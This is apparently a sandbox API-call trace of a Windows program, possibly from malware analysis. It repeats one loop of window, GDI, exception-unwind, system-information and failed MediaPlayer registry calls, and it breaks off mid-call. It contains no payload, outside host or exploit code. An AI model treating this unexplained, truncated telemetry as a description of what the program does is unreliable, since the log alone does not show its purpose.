[0092.283] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.283] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.283] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.283] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.283] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.283] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.283] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.283] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.283] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.283] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.284] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.284] BeginPath (hdc=0x0) returned 0 [0092.284] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.284] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.284] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.284] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.284] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.284] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.284] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.284] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.284] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.284] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.284] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.284] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.284] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.284] BeginPath (hdc=0x0) returned 0 [0092.284] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.284] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.284] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.284] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.284] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.284] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.284] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.284] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.284] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.284] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.284] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.285] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.285] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.285] BeginPath (hdc=0x0) returned 0 [0092.285] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.285] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.285] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.285] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.285] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.285] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.285] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.285] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.285] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.285] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.285] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.285] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.285] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.285] BeginPath (hdc=0x0) returned 0 [0092.285] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.285] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.285] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.285] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.285] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.285] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.285] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.285] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.285] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.285] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.286] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.286] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.286] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.286] BeginPath (hdc=0x0) returned 0 [0092.286] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.286] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.286] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.286] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.286] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.286] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.286] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.286] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.286] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.286] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.286] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.286] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.286] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.286] BeginPath (hdc=0x0) returned 0 [0092.286] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.286] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.286] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.286] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.286] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.286] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.286] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.286] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.287] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.287] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.287] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.287] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.287] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.287] BeginPath (hdc=0x0) returned 0 [0092.287] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.287] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.287] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.287] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.287] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.287] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.287] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.287] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.287] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.287] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.287] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.287] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.287] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.287] BeginPath (hdc=0x0) returned 0 [0092.287] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.287] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.287] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.287] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.287] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.287] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.287] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.287] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.288] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.288] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.288] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.288] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.288] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.288] BeginPath (hdc=0x0) returned 0 [0092.288] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.288] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.288] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.288] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.288] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.288] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.289] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.289] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.289] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.289] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.289] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.289] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.289] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.289] BeginPath (hdc=0x0) returned 0 [0092.289] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.289] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.289] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.289] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.289] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.289] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.289] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.289] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.289] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.289] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.289] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.289] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.289] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.289] BeginPath (hdc=0x0) returned 0 [0092.289] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.289] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.289] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.289] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.289] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.289] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.290] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.290] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.290] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.290] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.290] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.290] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.290] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.290] BeginPath (hdc=0x0) returned 0 [0092.290] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.290] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.290] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.290] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.290] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.290] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.290] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.290] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.290] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.290] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.290] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.290] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.290] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.290] BeginPath (hdc=0x0) returned 0 [0092.290] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.291] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.291] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.291] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.291] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.291] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.291] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.291] RegOpenKeyExW (in: hKey=0x80000002, 